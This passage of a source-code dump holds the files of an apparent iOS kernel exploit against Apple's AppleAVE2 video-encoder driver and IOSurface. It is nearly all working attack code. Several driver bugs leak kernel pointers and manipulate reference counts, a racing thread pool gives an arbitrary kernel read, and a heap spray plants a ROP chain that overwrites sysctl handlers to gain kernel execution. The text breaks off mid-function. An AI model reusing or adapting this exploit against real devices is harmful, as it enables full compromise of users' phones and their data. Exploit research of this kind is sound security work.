array_length) { 216 | 217 | unsigned long i = 0; 218 | for(i = 0; i < array_length; ++i) { 219 | pthread_join(threads[i], NULL); 220 | } 221 | } 222 | 223 | /* 224 | * Function name: kernel_read_read_address 225 | * Description: Reads an address from the kernel. 226 | expected_value and mask are values that can help with identifying the right value (or part of it) 227 | * Returns: kern_return_t and the value from the kernel as an output parameter. 228 | */ 229 | 230 | static 231 | kern_return_t kernel_read_read_address(void * kernel_ptr, uint64_t * value, uint64_t expected_value, uint64_t mask) { 232 | 233 | kern_return_t ret = KERN_SUCCESS; 234 | pthread_t bulk_setter[NUMBER_OF_BULK_RACERS]; 235 | int should_stop = 0; 236 | uint64_t out_value = 0; 237 | char input_buffer[IOSURFACE_BULK_ATTACHMENT_SIZE] = {0}; 238 | 239 | bulk_racer_args_t args = { 240 | .should_stop = &should_stop, 241 | /* we reduce 0x18 because we are actually going to leak the first 32 bits of address + 0x18 */ 242 | .address_target = kernel_ptr - 0x18, 243 | .out_value = &out_value, 244 | .expected_value = expected_value, 245 | .mask = mask 246 | }; 247 | 248 | int i = 0; 249 | for(i = 0; i < NUMBER_OF_BULK_RACERS; ++i) { 250 | if (pthread_create(&(bulk_setter[i]), NULL, kernel_read_surface_bulk_race_thread, &args)) 251 | { 252 | ERROR_LOG("Error creating bulk setter thread"); 253 | ret = KERN_ABORTED; 254 | goto cleanup; 255 | } 256 | } 257 | 258 | while(!should_stop) { 259 | apple_ave_pwn_put_data_in_bulk(g_surface_kernel_ptr + IOSURFACE_OFFSET_BULK_ATTACHMENT); 260 | } 261 | 262 | kernel_read_wait_for_all_threads(bulk_setter, NUMBER_OF_BULK_RACERS); 263 | 264 | *value = (uint64_t)out_value; 265 | 266 | cleanup: 267 | should_stop = 1; 268 | 269 | kernel_read_wait_for_all_threads(bulk_setter, NUMBER_OF_BULK_RACERS); 270 | 271 | /* Cleans up the surface's attachment */ 272 | iosurface_utils_set_bulk_attachment_flag(input_buffer, IOSURFACE_BULKATTACHMENT_FLAG_SET_ALL_BULKS); 273 | iosurface_utils_set_bulk_attachment(g_surface_conn, g_surface_id_for_arbitrary_read, 274 | input_buffer); 275 | 276 | return ret; 277 | } 278 | 279 | 280 | 281 | /* 282 | * Function name: kernel_read_leak_kernel_base 283 | * Description: Leaks the kernel base using another vulnerability. 284 | Please note that this function might block a little bit. 285 | * Returns: kern_return_t and the kernel base in the output params. 286 | */ 287 | 288 | kern_return_t kernel_read_leak_kernel_base(void ** kernel_base) { 289 | 290 | kern_return_t ret = KERN_SUCCESS; 291 | uint64_t value = 0; 292 | void * iofence = NULL; 293 | void * iofence_vtable = NULL; 294 | 295 | /* Read the IOFence object first */ 296 | ret = kernel_read_read_address((char*)apple_ave_pwn_get_bad_surface_kernel_ptr() + 0x210, &value, 297 | 0, 0); 298 | if (KERN_SUCCESS != ret) 299 | { 300 | ERROR_LOG("Error leaking IOFence object"); 301 | goto cleanup; 302 | } 303 | 304 | DEBUG_LOG("Before ORing: %p", (void*)value); 305 | 306 | value |= 0xfffffff000000000; 307 | iofence = (void*)value; 308 | 309 | DEBUG_LOG("IOFence: %p", iofence); 310 | //DEBUG_LOG("IOFence, real: %p", (void*)r64(apple_ave_pwn_get_bad_surface_kernel_ptr() + 0x210)); 311 | 312 | /* Read the vtable from the IOFence object */ 313 | ret = kernel_read_read_address(iofence, &value, 314 | OFFSET(iofence_vtable_offset), 0xfff); 315 | if (KERN_SUCCESS != ret) 316 | { 317 | ERROR_LOG("Error leaking IOFence's vtable"); 318 | goto cleanup; 319 | } 320 | 321 | value |= 0xfffffff000000000; 322 | iofence_vtable = (void*)value; 323 | 324 | DEBUG_LOG("IOFence's vtable: %p", iofence_vtable); 325 | //DEBUG_LOG("IOFence's vtable, real: %p", (void*)r64(r64(apple_ave_pwn_get_bad_surface_kernel_ptr() + 0x210))); 326 | 327 | *kernel_base = (iofence_vtable - OFFSET(iofence_vtable_offset)); 328 | /* 329 | usleep(10000); 330 | 331 | iofence_vtable = r64(apple_ave_pwn_get_bad_surface_kernel_ptr()); 332 | 333 | DEBUG_LOG("IOSurface vtable: %p", iofence_vtable); 334 | 335 | *kernel_base = iofence_vtable - (0xFFFFFFF006EF4778 - OFFSET(kernel_base)); 336 | 337 | DEBUG_LOG("kernel base: %p", *kernel_base); 338 | DEBUG_LOG("kernel base magic: %p", r64(*kernel_base)); 339 | */ 340 | 341 | cleanup: 342 | return ret; 343 | } 344 | 345 | 346 | 347 | 348 | 349 | /* 350 | * Function name: kernel_read_init 351 | * Description: Initializes the camera connection for the establishment of an arbitrary read. 352 | * Returns: kern_return_t. 353 | */ 354 | 355 | kern_return_t kernel_read_init() { 356 | 357 | kern_return_t ret = KERN_SUCCESS; 358 | 359 | ret = kernel_read_initialize_globals(); 360 | if (KERN_SUCCESS != ret) 361 | { 362 | ERROR_LOG("Error initializing globals"); 363 | goto cleanup; 364 | } 365 | 366 | ret = apple_ave_pwn_get_surface_kernel_address(g_surface_id_for_arbitrary_read, &g_surface_kernel_ptr); 367 | if (KERN_SUCCESS != ret) 368 | { 369 | ERROR_LOG("Error getting the kernel pointer of our special IOSurface object %d", 370 | g_surface_id_for_arbitrary_read); 371 | goto cleanup; 372 | } 373 | 374 | DEBUG_LOG("kernel pointer of IOSurface object %d is %p", g_surface_id_for_arbitrary_read, g_surface_kernel_ptr); 375 | 376 | cleanup: 377 | if (KERN_SUCCESS != ret) 378 | { 379 | kernel_read_cleanup(); 380 | } 381 | 382 | return ret; 383 | } -------------------------------------------------------------------------------- /heap_spray.m: -------------------------------------------------------------------------------- 1 | #include "heap_spray.h" 2 | #include "iosurface_utils.h" 3 | #include "apple_ave_pwn.h" 4 | #include "log.h" 5 | #include "utils.h" 6 | #include "offsets.h" 7 | 8 | static io_connect_t g_surface_conn = 0; 9 | static uint32_t g_spraying_surface = 0; 10 | 11 | static uint32_t g_surface_id_to_leak_address = 0; 12 | static void * g_surface_kernel_address = NULL; 13 | 14 | static void * g_fake_sysctl_handlers = NULL; 15 | 16 | static void * g_new_sprayed_object = NULL; 17 | 18 | struct sysctl_oid { 19 | void *oid_parent; 20 | void * oid_link; 21 | int oid_number; 22 | int oid_kind; 23 | void *oid_arg1; 24 | int oid_arg2; 25 | const char *oid_name; 26 | int (*oid_handler); 27 | const char *oid_fmt; 28 | const char *oid_descr; /* offsetof() field / long description */ 29 | int oid_version; 30 | int oid_refcnt; 31 | }; 32 | 33 | /* 34 | * Function name: heap_spray_prepare_buffer_for_rop 35 | * Description: Prepares our buffer for a ROP chain. 36 | * Returns: void. 37 | */ 38 | 39 | void heap_spray_prepare_buffer_for_rop(void * function, uint64_t arg0, 40 | uint64_t arg1, uint64_t arg2) { 41 | 42 | *(uint64_t*)(g_new_sprayed_object + SPRAY_SYSCTL_HELPER_EXECUTION + 0x18) = arg2; 43 | *(uint64_t*)(g_new_sprayed_object + SPRAY_SYSCTL_HELPER_EXECUTION_ROP + 0x10) = arg0; 44 | *(uint64_t*)(g_new_sprayed_object + SPRAY_SYSCTL_HELPER_EXECUTION_ROP + 0x18) = arg1; 45 | *(void**)(g_new_sprayed_object + SPRAY_SYSCTL_HELPER_EXECUTION_ROP + 0x20) = function; 46 | } 47 | 48 | 49 | 50 | /* 51 | * Function name: heap_spray_initialize_fake_sysctl_buffer 52 | * Description: Initializes a fake sysctl handler for the overwrite. 53 | * Returns: kern_return_t (but in reality KERN_SUCCESS on success and something else on failure). 54 | */ 55 | 56 | kern_return_t heap_spray_initialize_fake_sysctl_buffer() { 57 | 58 | kern_return_t ret = KERN_SUCCESS; 59 | struct sysctl_oid * sysctl = NULL; 60 | 61 | /* Overwriting both l1dcachesize and l1icachesize */ 62 | sysctl = (struct sysctl_oid *)malloc(SYSCTL_HANDLER_SIZE * 2); 63 | if (NULL == sysctl) 64 | { 65 | ERROR_LOG("Error allocating 0x%x bytes for fake sysctls", SYSCTL_HANDLER_SIZE * 2); 66 | ret = KERN_MEMORY_ERROR; 67 | goto cleanup; 68 | } 69 | 70 | g_fake_sysctl_handlers = sysctl; 71 | 72 | sysctl->oid_parent = offsets_get_kernel_base() + OFFSET(sysctl_hw_family); 73 | sysctl->oid_link = offsets_get_kernel_base() + OFFSET(l1dcachesize_handler) + SYSCTL_HANDLER_SIZE; 74 | sysctl->oid_name = offsets_get_kernel_base() + OFFSET(l1dcachesize_string); 75 | 76 | /* Will call OSSerializer::serialize */ 77 | sysctl->oid_handler = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 78 | 79 | /* First parameter to OSSerializer::serialize */ 80 | *(void**)((char*)sysctl + 0x10) = g_surface_kernel_address + SPRAY_SYSCTL_HELPER; 81 | 82 | /* Second parameter to OSSerializer::serialize */ 83 | *(unsigned long*)((char*)sysctl + 0x18) = IOSURFACE_KERNEL_OBJECT_SIZE; 84 | 85 | /* This will call again to OSSerializer::serialize */ 86 | *(void**)((char*)sysctl + 0x20) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 87 | 88 | sysctl->oid_fmt = offsets_get_kernel_base() + OFFSET(quad_format_string); 89 | sysctl->oid_descr = offsets_get_kernel_base() + OFFSET(null_terminator); 90 | 91 | sysctl = (struct sysctl_oid*)((char*)sysctl + SYSCTL_HANDLER_SIZE); 92 | 93 | sysctl->oid_parent = offsets_get_kernel_base() + OFFSET(sysctl_hw_family); 94 | sysctl->oid_link = offsets_get_kernel_base() + OFFSET(l1dcachesize_handler) + (2 * SYSCTL_HANDLER_SIZE); 95 | sysctl->oid_name = offsets_get_kernel_base() + OFFSET(l1icachesize_string); 96 | 97 | /* Will call OSSerializer::serialize */ 98 | sysctl->oid_handler = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 99 | 100 | /* First parameter to OSSerializer::serialize */ 101 | *(void**)((char*)sysctl + 0x10) = g_surface_kernel_address + SPRAY_SYSCTL_HELPER_EXECUTION; 102 | 103 | /* Second parameter to OSSerializer::serialize */ 104 | *(unsigned long*)((char*)sysctl + 0x18) = IOSURFACE_KERNEL_OBJECT_SIZE; 105 | 106 | /* This will call again to OSSerializer::serialize */ 107 | *(void**)((char*)sysctl + 0x20) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 108 | 109 | sysctl->oid_fmt = offsets_get_kernel_base() + OFFSET(quad_format_string); 110 | sysctl->oid_descr = offsets_get_kernel_base() + OFFSET(null_terminator); 111 | 112 | 113 | cleanup: 114 | return ret; 115 | } 116 | 117 | 118 | 119 | /* 120 | * Function name: heap_spray_cleanup 121 | * Description: Cleans up the heap spraying. Freeing up resources. 122 | * Returns: void. 123 | */ 124 | 125 | void heap_spray_cleanup() { 126 | 127 | if (g_surface_conn) 128 | { 129 | if (g_surface_id_to_leak_address) 130 | { 131 | iosurface_utils_release_surface(g_surface_conn, g_surface_id_to_leak_address); 132 | g_surface_id_to_leak_address = 0; 133 | } 134 | 135 | if (g_spraying_surface) 136 | { 137 | iosurface_utils_release_surface(g_surface_conn, g_spraying_surface); 138 | g_spraying_surface = 0; 139 | } 140 | 141 | IOServiceClose(g_surface_conn); 142 | g_surface_conn = 0; 143 | } 144 | 145 | if (g_fake_sysctl_handlers) 146 | { 147 | free(g_fake_sysctl_handlers); 148 | g_fake_sysctl_handlers = NULL; 149 | } 150 | 151 | if (g_new_sprayed_object) 152 | { 153 | free(g_new_sprayed_object); 154 | g_new_sprayed_object = NULL; 155 | } 156 | } 157 | 158 | 159 | /* 160 | * Function name: heap_spray_init 161 | * Description: Initializes the heap spray. 162 | * Returns: kern_return_t. 163 | */ 164 | 165 | kern_return_t heap_spray_init() { 166 | 167 | kern_return_t ret = KERN_SUCCESS; 168 | 169 | g_new_sprayed_object = malloc(IOSURFACE_KERNEL_OBJECT_SIZE); 170 | if (NULL == g_new_sprayed_object) 171 | { 172 | ERROR_LOG("Error mallocing g_new_sprayed_object"); 173 | ret = KERN_MEMORY_ERROR; 174 | goto cleanup; 175 | } 176 | 177 | ret = iosurface_utils_get_connection(&g_surface_conn); 178 | if (KERN_SUCCESS != ret) 179 | { 180 | ERROR_LOG("Error creating an IOSurface connection"); 181 | goto cleanup; 182 | } 183 | 184 | ret = iosurface_utils_create_surface(g_surface_conn, &g_spraying_surface, NULL); 185 | if (KERN_SUCCESS != ret) 186 | { 187 | ERROR_LOG("Error creating a spraying IOSurface object"); 188 | goto cleanup; 189 | } 190 | 191 | ret = iosurface_utils_create_surface(g_surface_conn, &g_surface_id_to_leak_address, NULL); 192 | if (KERN_SUCCESS != ret) 193 | { 194 | ERROR_LOG("Error creating surface for leak"); 195 | goto cleanup; 196 | } 197 | 198 | DEBUG_LOG("g_surface_id_to_leak_address %d", g_surface_id_to_leak_address); 199 | 200 | ret = apple_ave_pwn_get_surface_kernel_address(g_surface_id_to_leak_address, &g_surface_kernel_address); 201 | if (KERN_SUCCESS != ret) 202 | { 203 | ERROR_LOG("Error leaking address for surface %d", g_surface_id_to_leak_address); 204 | goto cleanup; 205 | } 206 | 207 | DEBUG_LOG("kernel address of surface %d is %p", g_surface_id_to_leak_address, g_surface_kernel_address); 208 | 209 | 210 | cleanup: 211 | if (KERN_SUCCESS != ret) 212 | { 213 | heap_spray_cleanup(); 214 | } 215 | return ret; 216 | } 217 | 218 | /* 219 | * Function name: heap_spray_get_spraying_buffer 220 | * Description: Creates a buffer for spraying. 221 | object_address is the alleged address that the allocation will take place in. 222 | * Returns: char *. 223 | */ 224 | 225 | static 226 | char * heap_spray_get_spraying_buffer(void * object_address) { 227 | 228 | uint32_t i = 0; 229 | kern_return_t ret = KERN_SUCCESS; 230 | char * data = malloc(IOSURFACE_KERNEL_OBJECT_SIZE); 231 | if (NULL == data) 232 | { 233 | return data; 234 | } 235 | 236 | DEBUG_LOG("ret_gadget: %p", offsets_get_kernel_base() + OFFSET(ret_gadget)); 237 | 238 | for(i = 0; i < IOSURFACE_KERNEL_OBJECT_SIZE; i += sizeof(uint64_t)) { 239 | *(void**)(data+i) = offsets_get_kernel_base() + OFFSET(ret_gadget); 240 | } 241 | 242 | *(void**)(data) = object_address; 243 | *(uint32_t*)(data + 0x8) = 0x100; /* We don't want to be freed. never. */ 244 | 245 | /* Just for the fun, doesn't really happen in normal flow */ 246 | *(void**)(data + 0x260) = offsets_get_kernel_base() + OFFSET(panic); 247 | 248 | *(void**)(data + OFFSET(iosurface_vtable_offset_kernel_hijack)) = 249 | offsets_get_kernel_base() + OFFSET(osserializer_serialize); 250 | 251 | //*(void**)(data + 0x98) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 252 | //*(void**)(data + 0xA0) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 253 | 254 | /* OSSerializer::serialize(data + 0x234, SYSCTL_HANDLER_SIZE * 2) */ 255 | *(void**)(data + 0x10) = object_address + 0x234; 256 | *(unsigned long*)(data + 0x18) = SYSCTL_HANDLER_SIZE * 2; /* third parameter for ROP chain */ 257 | *(void**)(data + 0x20) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 258 | 259 | 260 | /* copyin(g_fake_sysctl_handlers, l1dcachesize_handler, SYSCTL_HANDLER_SIZE * 2) */ 261 | *(void**)(data + 0x234 + 0x10) = g_fake_sysctl_handlers; /* first paramter for ROP chain */ 262 | *(void**)(data + 0x234 + 0x18) = offsets_get_kernel_base() + OFFSET(l1dcachesize_handler); /* second parameter for ROP chain */ 263 | *(void**)(data + 0x234 + 0x20) = offsets_get_kernel_base() + OFFSET(copyin); 264 | 265 | 266 | /* copyin(g_fake_sysctl_handlers, l1dcachesize_handler, SYSCTL_HANDLER_SIZE * 2) */ 267 | 268 | 269 | /* So we can always modify this object */ 270 | *(void**)(data + SPRAY_SYSCTL_HELPER + 0x10) = g_new_sprayed_object; 271 | *(void**)(data + SPRAY_SYSCTL_HELPER + 0x18) = object_address; 272 | *(void**)(data + SPRAY_SYSCTL_HELPER + 0x20) = offsets_get_kernel_base() + OFFSET(copyin); 273 | 274 | /* SPRAY_SYSCTL_HELPER_EXECUTION */ 275 | *(void**)(data + SPRAY_SYSCTL_HELPER_EXECUTION + 0x10) = object_address + SPRAY_SYSCTL_HELPER_EXECUTION_ROP; 276 | /* arg2 */ 277 | *(void**)(data + SPRAY_SYSCTL_HELPER_EXECUTION + 0x18) = (void*)0x1; 278 | *(void**)(data + SPRAY_SYSCTL_HELPER_EXECUTION + 0x20) = offsets_get_kernel_base() + OFFSET(osserializer_serialize); 279 | 280 | //memset(data, 0x41414141, IOSURFACE_KERNEL_OBJECT_SIZE); 281 | 282 | memcpy(g_new_sprayed_object, data, IOSURFACE_KERNEL_OBJECT_SIZE); 283 | /* 284 | for(i = 0; i < IOSURFACE_KERNEL_OBJECT_SIZE; i += sizeof(uint64_t)) { 285 | DEBUG_LOG("local_spray[0x%x] = %p", i, *(void**)(g_new_sprayed_object + i)); 286 | } 287 | */ 288 | return data; 289 | } 290 | 291 | 292 | 293 | /* 294 | * Function name: heap_spray_start_spraying 295 | * Description: Starts the actual spraying. 296 | * Returns: kern_return_t and the kernel address with our allocated data as an output parameter. 297 | */ 298 | 299 | kern_return_t heap_spray_start_spraying(void ** kernel_allocated_data) { 300 | 301 | kern_return_t ret = KERN_SUCCESS; 302 | char * data_to_spray = NULL; 303 | char * data_to_spray_base64 = NULL; 304 | uint32_t i = 0; 305 | char key[] = {'A', 0}; 306 | char * key_ptr = key; 307 | 308 | ret = heap_spray_initialize_fake_sysctl_buffer(); 309 | if (KERN_SUCCESS != ret) 310 | { 311 | ERROR_LOG("Error initializing the fake sysctl buffer"); 312 | goto cleanup; 313 | } 314 | 315 | data_to_spray = heap_spray_get_spraying_buffer(g_surface_kernel_address); 316 | if (NULL == data_to_spray) 317 | { 318 | ERROR_LOG("Error allocating data for spraying"); 319 | goto cleanup; 320 | } 321 | 322 | data_to_spray_base64 = utils_get_base64_payload(data_to_spray, IOSURFACE_KERNEL_OBJECT_SIZE); 323 | if (NULL == data_to_spray_base64) 324 | { 325 | ERROR_LOG("Error converting data to base64"); 326 | goto cleanup; 327 | } 328 | 329 | ret = iosurface_utils_release_surface(g_surface_conn, g_surface_id_to_leak_address); 330 | if (KERN_SUCCESS != ret) 331 | { 332 | ERROR_LOG("Error freeing surface %d", g_surface_id_to_leak_address); 333 | goto cleanup; 334 | } 335 | 336 | g_surface_id_to_leak_address = 0; 337 | 338 | for(i = 0; i < NUMBER_OF_OBJECTS_TO_SPRAY; ++i) { 339 | key[0] = key[0] + 1; 340 | ret = iosurface_utils_set_value(g_surface_conn, g_spraying_surface, key_ptr, 341 | data_to_spray_base64); 342 | 343 | if (KERN_SUCCESS != ret) 344 | { 345 | ERROR_LOG("Error setting value (i = %d)", i); 346 | goto cleanup; 347 | } 348 | } 349 | 350 | *kernel_allocated_data = g_surface_kernel_address; 351 | 352 | cleanup: 353 | if (data_to_spray_base64) 354 | { 355 | free(data_to_spray_base64); 356 | data_to_spray_base64 = NULL; 357 | } 358 | 359 | if (data_to_spray) 360 | { 361 | free(data_to_spray); 362 | data_to_spray = NULL; 363 | } 364 | 365 | return ret; 366 | } 367 | 368 | -------------------------------------------------------------------------------- /apple_ave_pwn.m: -------------------------------------------------------------------------------- 1 | #include "apple_ave_pwn.h" 2 | #include "log.h" 3 | #include "iosurface_utils.h" 4 | #include "apple_ave_utils.h" 5 | #include "offsets.h" 6 | 7 | static io_connect_t g_surface_conn = 0; 8 | static io_connect_t g_apple_ave_conn = 0; 9 | 10 | /* Due to ref leak bugs in AppleAVE2, this surface will, unfortunately, never be freed */ 11 | static void * g_bad_surface_that_will_never_be_freed_kernel_ptr = NULL; 12 | static uint32_t g_bad_surface_that_will_never_be_freed = 0; 13 | static void * g_bad_surface_buffer = NULL; 14 | static size_t g_bad_surface_buffer_size = 0; 15 | 16 | /* 17 | * Function name: apple_ave_pwn_get_bad_surface_kernel_ptr 18 | * Description: Gets the kernel pointer of our g_bad_surface_that_will_never_be_freed. 19 | * Returns: void *. 20 | */ 21 | 22 | void * apple_ave_pwn_get_bad_surface_kernel_ptr() { 23 | 24 | return g_bad_surface_that_will_never_be_freed_kernel_ptr; 25 | } 26 | 27 | /* 28 | * Function name: apple_ave_pwn_drop_surface_refcount 29 | * Description: Drops the refcount of the IOSurface object. 30 | * Returns: kern_return_t. 31 | */ 32 | 33 | kern_return_t apple_ave_pwn_drop_surface_refcount(void * surface_kernel_address) { 34 | 35 | kern_return_t ret = KERN_SUCCESS; 36 | io_connect_t apple_ave_conn_for_drop_refcount = 0; 37 | char input_buffer[ENCODE_FRAME_INPUT_BUFFER_SIZE] = {0}; 38 | char output_buffer[ENCODE_FRAME_OUTPUT_BUFFER_SIZE] = {0}; 39 | 40 | ret = apple_ave_utils_get_connection(&apple_ave_conn_for_drop_refcount); 41 | if (KERN_SUCCESS != ret) 42 | { 43 | ERROR_LOG("Error initiating a connection to the AppleAVE driver"); 44 | goto cleanup; 45 | } 46 | 47 | ret = apple_ave_utils_add_client(apple_ave_conn_for_drop_refcount); 48 | if (KERN_SUCCESS != ret) 49 | { 50 | ERROR_LOG("Error adding AppleAVE2 client"); 51 | goto cleanup; 52 | } 53 | 54 | //*(unsigned int*)input_buffer = 0xDEADBEEF; 55 | *(unsigned int*)(input_buffer + 0x4) = g_bad_surface_that_will_never_be_freed; 56 | *(unsigned int*)(input_buffer + 0x8) = g_bad_surface_that_will_never_be_freed; 57 | *(unsigned int*)(input_buffer + 0xC) = g_bad_surface_that_will_never_be_freed; 58 | *(unsigned int*)(input_buffer + 0xD4) = g_bad_surface_that_will_never_be_freed; 59 | *(unsigned int*)(input_buffer + 0xD8) = g_bad_surface_that_will_never_be_freed; 60 | *(unsigned int*)(input_buffer + 0xE8) = g_bad_surface_that_will_never_be_freed; 61 | *(unsigned int*)(input_buffer + 0xEC) = g_bad_surface_that_will_never_be_freed; 62 | input_buffer[0xFC] = 1; 63 | input_buffer[0x2F4] = 1; 64 | 65 | /* the surface kernel address to drop */ 66 | *(void**)(input_buffer + 0x100) = surface_kernel_address; 67 | 68 | /* this will fail the call, after the surface kernel address is already "attached" */ 69 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_info_type)) = 0xffff; 70 | 71 | *((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_chroma_format_idc)) = 1; 72 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_width)) = 0xC0; 73 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_height)) = 0xC0; 74 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_slice_per_frame)) = 0x1; 75 | 76 | ret = apple_ave_utils_prepare_to_encode_frames(apple_ave_conn_for_drop_refcount, input_buffer, output_buffer); 77 | if (kIOReturnError != ret) 78 | { 79 | ERROR_LOG("Error preparing to encode frames..."); 80 | goto cleanup; 81 | } 82 | 83 | ret = KERN_SUCCESS; 84 | 85 | 86 | cleanup: 87 | 88 | if (apple_ave_conn_for_drop_refcount) 89 | { 90 | apple_ave_utils_remove_client(apple_ave_conn_for_drop_refcount); 91 | IOServiceClose(apple_ave_conn_for_drop_refcount); 92 | } 93 | 94 | return ret; 95 | } 96 | 97 | 98 | 99 | /* 100 | * Function name: apple_ave_pwn_get_surface_kernel_address 101 | * Description: Returns the kernel address of the IOSurface object. 102 | The surface ID might be not be freed later on, due to ref leak bugs! 103 | * Returns: kern_return_t and surface kernel address in output params. 104 | */ 105 | 106 | kern_return_t apple_ave_pwn_get_surface_kernel_address(uint32_t surface_id, void ** surface_kernel_address) { 107 | 108 | kern_return_t ret = KERN_SUCCESS; 109 | char input_buffer[ENCODE_FRAME_INPUT_BUFFER_SIZE] = {0}; 110 | char output_buffer[ENCODE_FRAME_OUTPUT_BUFFER_SIZE] = {0}; 111 | 112 | //*(unsigned int*)input_buffer = 0xDEADBEEF; 113 | *(unsigned int*)(input_buffer + 0x4) = g_bad_surface_that_will_never_be_freed; 114 | *(unsigned int*)(input_buffer + 0x8) = g_bad_surface_that_will_never_be_freed; 115 | *(unsigned int*)(input_buffer + 0xC) = surface_id; 116 | *(unsigned int*)(input_buffer + 0xD4) = g_bad_surface_that_will_never_be_freed; 117 | *(unsigned int*)(input_buffer + 0xD8) = g_bad_surface_that_will_never_be_freed; 118 | *(unsigned int*)(input_buffer + 0xE8) = g_bad_surface_that_will_never_be_freed; 119 | *(unsigned int*)(input_buffer + 0xEC) = g_bad_surface_that_will_never_be_freed; 120 | input_buffer[0xFC] = 1; 121 | input_buffer[0x2F4] = 1; 122 | 123 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_info_type)) = 0x4567; 124 | 125 | *((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_chroma_format_idc)) = 1; 126 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_width)) = 0xC0; 127 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_height)) = 0xC0; 128 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_slice_per_frame)) = 0x1; 129 | 130 | ret = apple_ave_utils_prepare_to_encode_frames(g_apple_ave_conn, input_buffer, output_buffer); 131 | if (KERN_SUCCESS != ret) 132 | { 133 | ERROR_LOG("Error preparing to encode frames..."); 134 | goto cleanup; 135 | } 136 | 137 | *surface_kernel_address = *(void**)output_buffer; 138 | 139 | /* Leaking the address also leaks a refcount. So we drop it manually (using, you guessed, another vulnerability). */ 140 | apple_ave_pwn_drop_surface_refcount(*surface_kernel_address); 141 | 142 | cleanup: 143 | return ret; 144 | } 145 | 146 | 147 | /* 148 | * Function name: apple_ave_pwn_put_data_in_bulk 149 | * Description: Exploits another vulnerability to read from an address, dereference it, 150 | and then put the value back. 151 | * Returns: kern_return_t. 152 | */ 153 | 154 | kern_return_t apple_ave_pwn_put_data_in_bulk(void * address_with_data) { 155 | 156 | kern_return_t ret = KERN_SUCCESS; 157 | char input_buffer[ENCODE_FRAME_INPUT_BUFFER_SIZE] = {0}; 158 | char output_buffer[ENCODE_FRAME_OUTPUT_BUFFER_SIZE] = {0}; 159 | 160 | bzero(input_buffer, ENCODE_FRAME_INPUT_BUFFER_SIZE); 161 | bzero(output_buffer, ENCODE_FRAME_OUTPUT_BUFFER_SIZE); 162 | 163 | 164 | //*(unsigned int*)input_buffer = 0xDEADBEEF; 165 | *(unsigned int*)(input_buffer) = g_bad_surface_that_will_never_be_freed; 166 | *(unsigned int*)(input_buffer + 4) = g_bad_surface_that_will_never_be_freed; 167 | *(unsigned int*)(input_buffer + 8) = g_bad_surface_that_will_never_be_freed; 168 | *(unsigned int*)(input_buffer + 0xC) = g_bad_surface_that_will_never_be_freed; 169 | *(unsigned int*)(input_buffer + 0xD4) = g_bad_surface_that_will_never_be_freed; 170 | *(unsigned int*)(input_buffer + 0xD8) = g_bad_surface_that_will_never_be_freed; 171 | *(unsigned int*)(input_buffer + 0xE8) = g_bad_surface_that_will_never_be_freed; 172 | *(unsigned int*)(input_buffer + 0xEC) = g_bad_surface_that_will_never_be_freed; 173 | 174 | *(unsigned int*)((char*)g_bad_surface_buffer + 4) = 0xC00CBABE; 175 | 176 | *(unsigned int*)((char*)g_bad_surface_buffer + offsets_get_offsets().encode_frame_offset_info_type) = 0x4569; 177 | 178 | *(void**)((char*)g_bad_surface_buffer + offsets_get_offsets().encode_frame_offset_iosurface_buffer_mgr) = address_with_data; 179 | *((char*)g_bad_surface_buffer + offsets_get_offsets().encode_frame_offset_keep_cache) = 0; 180 | //*(unsigned int*)((char*)g_bad_surface_buffer + 0xC) = 5; 181 | 182 | ret = apple_ave_utils_encode_frame(g_apple_ave_conn, input_buffer, output_buffer); 183 | if (KERN_SUCCESS != ret) 184 | { 185 | //ERROR_LOG("Error preparing to encode frames..."); 186 | goto cleanup; 187 | } 188 | 189 | 190 | cleanup: 191 | *(void**)((char*)g_bad_surface_buffer + offsets_get_offsets().encode_frame_offset_iosurface_buffer_mgr) = NULL; 192 | return ret; 193 | } 194 | 195 | 196 | 197 | /* 198 | * Function name: apple_ave_pwn_init 199 | * Description: Initializes connections and stuff for exploitation with the AppleAVE2 driver. 200 | * Returns: kern_return_t. 201 | */ 202 | 203 | kern_return_t apple_ave_pwn_init() { 204 | 205 | kern_return_t ret = KERN_SUCCESS; 206 | char surface_data[IOSURFACE_DICTIONARY_SIZE] = {0}; 207 | 208 | ret = apple_ave_utils_get_connection(&g_apple_ave_conn); 209 | if (KERN_SUCCESS != ret) 210 | { 211 | ERROR_LOG("Error initiating a connection to the AppleAVE driver"); 212 | goto cleanup; 213 | } 214 | 215 | ret = apple_ave_utils_add_client(g_apple_ave_conn); 216 | if (KERN_SUCCESS != ret) 217 | { 218 | ERROR_LOG("Error adding AppleAVE2 client"); 219 | IOServiceClose(g_apple_ave_conn); 220 | g_apple_ave_conn = 0; 221 | goto cleanup; 222 | } 223 | 224 | ret = iosurface_utils_get_connection(&g_surface_conn); 225 | if (KERN_SUCCESS != ret) 226 | { 227 | ERROR_LOG("Error initiating connection to IOSurfaceRoot"); 228 | goto cleanup; 229 | } 230 | 231 | ret = iosurface_utils_create_surface(g_surface_conn, &g_bad_surface_that_will_never_be_freed, surface_data); 232 | if (KERN_SUCCESS != ret) 233 | { 234 | ERROR_LOG("Error creating a bad surface that will never be freed"); 235 | goto cleanup; 236 | } 237 | 238 | g_bad_surface_buffer = *(void**)surface_data; 239 | g_bad_surface_buffer_size = *(uint32_t*)(surface_data+0x14); 240 | 241 | ret = apple_ave_pwn_get_surface_kernel_address(g_bad_surface_that_will_never_be_freed, 242 | &g_bad_surface_that_will_never_be_freed_kernel_ptr); 243 | 244 | if (KERN_SUCCESS != ret) 245 | { 246 | ERROR_LOG("Error getting kernel pointer for 